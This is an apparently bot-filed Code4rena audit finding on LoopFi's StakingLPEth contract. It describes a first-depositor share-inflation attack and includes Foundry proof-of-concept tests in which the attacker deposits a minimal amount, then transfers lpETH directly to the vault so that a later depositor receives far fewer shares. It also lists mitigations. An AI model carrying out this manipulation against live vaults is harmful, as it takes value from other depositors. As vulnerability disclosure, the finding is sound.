Exploitative Staking Strategy Leading to Vault Griefing in Staking

[c4-bot-3]

Lines of code

https://github.com/code-423n4/2024-07-loopfi/blob/57871f64bdea450c1f04c9a53dc1a78223719164/src/StakingLPEth.sol#L153

Vulnerability details

[H-1] TITLE: Exploitative Staking Strategy Leading to Vault Griefing in Staking

Description:
The StakingLpth::deposit function is an integral part of the Loopfi Ecosystem, which is designed to handle the staking of lpETH tokens. when users stake their lpETH token, they receive slpETH tokens in return, which represent a staked version of lpETH which accrue value over time as the yield from various levarage retaking strategies is added to the contract.
However, there exists a potential vulnerability where a malicious actor could manipulate the system through the transfer mechanism, leading to unexpected outcomes in the vault's state.
Specifically, such an actor can transfer tokens in such a way that it's affet the amount of slpETH distributed to other users.

Impact:

The vulnerability allows a malicious actor to disrupt the integrity of the Staking mechanism, potentially skewing the distribution of slpETH tokens. By exploiting this weakness, the attacker could disproportionately decrease the share of other stakers within the vault, leading to significant imbalances in the yield distribution. This not only undermines the fairness of the staking system but also poses a serious threat to the overall security and trust in the Loopfi Ecosystem, as it could discourage participation and erode confidence among stakeholders

Proof of Concept:

FIRST CASE STUDY

NOTE!!!: The Initial value of slpETH is set to be equal to lpETH (1 slpETH = 1 lpETH)

A scenairo where if everything were to happen Normainally, i.e No Malicious Intervention
we have two actors: Darkseid and Armstrong,

Total Asset before any deposit: 0,
Total Supply before any deposit: 0,
Darkseid deposits(staked) 1 lpETH via the stakingLpETH contract,
Preview Deposit of Darkseid:1e18 == 1 slpETH,
Total Asset after Darkseid deposit: 1e18 == lpETH
Total Supply after Darkseid deposit:1e18 == 1 slpETH
Armstrong deposits(staked) 20 lpETH via the stakingLpETH contract,
Preview Deposit of Armstrong:2e19 == 20 slpETH
Total Asset After Armstrong deposit: 2.1e19 == 21 lpETH
Total Supply After Armstrong deposit: 2.1e19 == 21 slpETH

copy code for logs
solidity

function test_deposit_staking() public {
      console.log("Total Asset before deposit", stakingLpEth.totalAssets());
      console.log("Total Supply before deposit", stakingLpEth.totalSupply());
      vm.startPrank(Darkseid);
      //---- Balcnce of Darkseid in the Liquidity pool before Depositing----//
      console.log("Bal before depositing :%e", liquidityPool.balanceOf(Darkseid));
      liquidityPool.approve(address(stakingLpEth), 1.0 ether);
      stakingLpEth.deposit(1.0 ether, Darkseid);
      console.log("Preview Deposit  of:%e", stakingLpEth.previewDeposit(1.0 ether));

      console.log("Total Asset after Darkseid deposit: %e", stakingLpEth.totalAssets());
      console.log("Total Supply after Darkseid deposit: %e", stakingLpEth.totalSupply());
      vm.stopPrank();

      // Check the Darkseid balance in the staking contract 
      assertEq(stakingLpEth.balanceOf(Darkseid), 1.0 ether); 

      //  Now, another user(Armstrong) tries to deposit
      vm.startPrank(Armstrong);
      uint256 userDepositAmount = 20 ether;
      liquidityPool.approve(address(stakingLpEth), userDepositAmount);
      stakingLpEth.deposit(userDepositAmount, Armstrong);
      console.log("Preview Deposit  of Armstrong:%e", stakingLpEth.previewDeposit(userDepositAmount));

      console.log("Total Asset After Armstrong deposit: %e", stakingLpEth.totalAssets());
      console.log("Total Supply After Armstrong deposit: %e", stakingLpEth.totalSupply());
      vm.stopPrank();
  }

SECOND CASE STUDY

A scenairo where things fall apart for other stakers. For simplicity, we would keep it to just two stakers(Actors), still Drakseid and Armstrong, but Darkseid becomes the malicious one, obviously(lol).

Total Asset before any deposit: 0,
Total Supply before any deposit: 0,
Darkseid deposits(staked) 1 lpETH via the stakingLpETH contract,
Preview Deposit of Darkseid:1e18 == 1 slpETH,
Darkseid transfers 100 lpETH into the staking contract,
Total Asset after Darkseid deposit: 101e18 == 101 lpETH,
Total Supply after Darkseid deposit:1e18 == 1 slpETH ------REMAINS THE SAME!
!! Next Depositor
Armstrong deposits(staked) 20 lpETH via the stakingLpETH contract,
Preview Deposit of Armstrong:1.98019801980198019e17 ~ 0.198 slpETH
Total Asset After Armstrong deposit:1.21e20 == 121 lpETH
Total Supply After Armstrong deposit: 1.198019801980198019e18 == 1.198 slpETH

copy code for logs
solidity

function test_deposit_staking() public {
      console.log("Total Asset before deposit", stakingLpEth.totalAssets());
      console.log("Total Supply before deposit", stakingLpEth.totalSupply());
      vm.startPrank(Darkseid);
      //---- Balcnce of Darkseid in the Liquidity pool before Depositing----//
      console.log("Bal before depositing :%e", liquidityPool.balanceOf(Darkseid));
       // // 1. Attacker Becomes the first to deposit(A minimal Amount) in order to break minting of shares
      liquidityPool.approve(address(stakingLpEth), 1.0 ether);
      stakingLpEth.deposit(1.0 ether, Darkseid);
      console.log("Preview Deposit  of:%e", stakingLpEth.previewDeposit(1.0 ether));

      console.log("Total Asset after Darkseid deposit: %e", stakingLpEth.totalAssets());
      console.log("Total Supply after Darkseid deposit: %e", stakingLpEth.totalSupply());
      // 2. Distort the share price calculation by transferring a large(Not neccessarily Large!!!) amount directly to the staking contract
      liquidityPool.transfer(address(stakingLpEth), 100 ether);
      vm.stopPrank();

      // Check the Darkseid balance in the staking contract 
      assertEq(stakingLpEth.balanceOf(Darkseid), 1.0 ether); 

      //3.  Now, another user(Armstrong) tries to deposit a reasonable Amount
      vm.startPrank(Armstrong);
      uint256 userDepositAmount = 20 ether;
      liquidityPool.approve(address(stakingLpEth), userDepositAmount);
      stakingLpEth.deposit(userDepositAmount, Armstrong);
      console.log("Preview Deposit  of Armstrong:%e", stakingLpEth.previewDeposit(userDepositAmount));

      console.log("Total Asset After Armstrong deposit: %e", stakingLpEth.totalAssets());
      console.log("Total Supply After Armstrong deposit: %e", stakingLpEth.totalSupply());
      //----------------------------- share Prices of the two Actors after share Price Manipulation-------------------------\\
      console.log("darkseid balance in staking contract after Acting badly: %e", stakingLpEth.balanceOf(darkseid));
      console.log("Armstrong balance in staking contract: %e", stakingLpEth.balanceOf(Armstrong));
      vm.stopPrank();
     
  }

From the test file attached above, it can be seen that Armstrong got a relatively low share(0.198 slpETH) than what he should get, even lower than the minmal amount the malicious Actor(Darkseid) deposited, from the last logs in the test file, it can be seen that the final share balance of the two actors after damage has been done is given as :
darkseid balance in staking contract: 1e18 == 1 slpETH,
Armstrong balance in staking contract: 1.98019801980198019e17 == 0.198 slpETH
Recommended Mitigation:

A few mitigations strategies Include:

1. Using an ERC4626 router
2. Keeping track of the total assets internally
3. Creating "dead shares"

OpenZeppelin/openzeppelin-contracts#3706 (comment)
OpenZeppelin/openzeppelin-contracts#3706 (comment)

Assessed type

Other